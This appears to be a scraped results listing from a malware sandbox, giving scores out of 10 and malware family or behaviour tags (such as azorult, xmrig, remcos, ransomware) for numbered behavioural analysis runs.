Score
1/10

behavioral110

Score
1/10

behavioral111

gozi_ifsb, banker, trojan
Score
10/10

behavioral112

gozi_ifsb, banker, trojan
Score
10/10

behavioral113

discovery
Score
8/10

behavioral114

discovery
Score
8/10

behavioral115

discovery
Score
6/10

behavioral116

discovery
Score
6/10

behavioral117

upx
Score
8/10

behavioral118

Score
1/10

behavioral119

Score
8/10

behavioral120

Score
3/10

behavioral121

evasion, persistence
Score
9/10

behavioral122

evasion, persistence
Score
9/10

behavioral123

xmrig, miner
Score
10/10

behavioral124

xmrig, miner
Score
10/10

behavioral125

azorult, infostealer, persistence, trojan
Score
10/10

behavioral126

azorult, infostealer, persistence, trojan
Score
10/10

behavioral127

evasion, persistence, trojan
Score
8/10

behavioral128

evasion, persistence, trojan
Score
8/10

behavioral129

Score
1/10

behavioral130

Score
1/10

behavioral131

persistence, ransomware, spyware
Score
8/10

behavioral132

ransomware, spyware
Score
8/10

behavioral133

evasion, trojan
Score
6/10

behavioral134

evasion, trojan
Score
6/10

behavioral135

Score
1/10

behavioral136

Score
1/10

behavioral137

Score
7/10

behavioral138

Score
7/10

behavioral139

Score
7/10

behavioral140

Score
7/10

behavioral141

gozi_ifsb, banker, bootkit, evasion, persistence, trojan
Score
10/10

behavioral142

gozi_ifsb, banker, bootkit, evasion, persistence, trojan
Score
10/10

behavioral143

warzonerat, infostealer, persistence, rat
Score
10/10

behavioral144

warzonerat, infostealer, persistence, rat
Score
10/10

behavioral145

Score
1/10

behavioral146

Score
1/10

behavioral147

ransomware, spyware
Score
9/10

behavioral148

ransomware, spyware
Score
9/10

behavioral149

xmrig, discovery, evasion, miner, persistence, upx
Score
10/10

behavioral150

xmrig, discovery, evasion, miner, persistence, upx
Score
10/10

behavioral151

Score
1/10

behavioral152

Score
1/10

behavioral153

Score
3/10

behavioral154

Score
3/10

behavioral155

upx
Score
8/10

behavioral156

upx
Score
8/10

behavioral157

Score
6/10

behavioral158

Score
6/10

behavioral159

persistence, spyware
Score
8/10

behavioral160

persistence, spyware
Score
8/10

behavioral161

glupteba, dropper, evasion, loader, persistence, trojan, upx
Score
10/10

behavioral162

glupteba, dropper, evasion, loader, persistence, trojan, upx
Score
10/10

behavioral163

hawkeye_reborn, m00nd3v_logger, keylogger, spyware, stealer, trojan
Score
10/10

behavioral164

hawkeye_reborn, m00nd3v_logger, keylogger, spyware, stealer, trojan
Score
10/10

behavioral165

Score
9/10

behavioral166

Score
9/10

behavioral167

remcos, persistence, rat
Score
10/10

behavioral168

persistence
Score
6/10

behavioral169

Score
7/10

behavioral170

Score
7/10

behavioral171

upx
Score
8/10

behavioral172

upx
Score
8/10

behavioral173

Score
8/10

behavioral174

Score
8/10

behavioral175

spyware
Score
7/10

behavioral176

spyware
Score
7/10

behavioral177

Score
8/10

behavioral178

Score
8/10

behavioral179

Score
3/10

behavioral180

Score
3/10

behavioral181

Score
1/10

behavioral182

Score
1/10

behavioral183

Score
1/10

behavioral184

Score
1/10

behavioral185

Score
1/10

behavioral186

Score
1/10

behavioral187

Score
1/10

behavioral188

Score
1/10

behavioral189

Score
1/10

behavioral190

Score
1/10

behavioral191

discovery, spyware
Score
8/10

behavioral192

spyware
Score
8/10

behavioral193

azorult, infostealer, trojan
Score
10/10

behavioral194

azorult, infostealer, trojan
Score
10/10

behavioral195

Score
7/10

behavioral196

Score
7/10

behavioral197

upx
Score
8/10

behavioral198

upx
Score
8/10

behavioral199

Score
1/10

behavioral200

Score
1/10
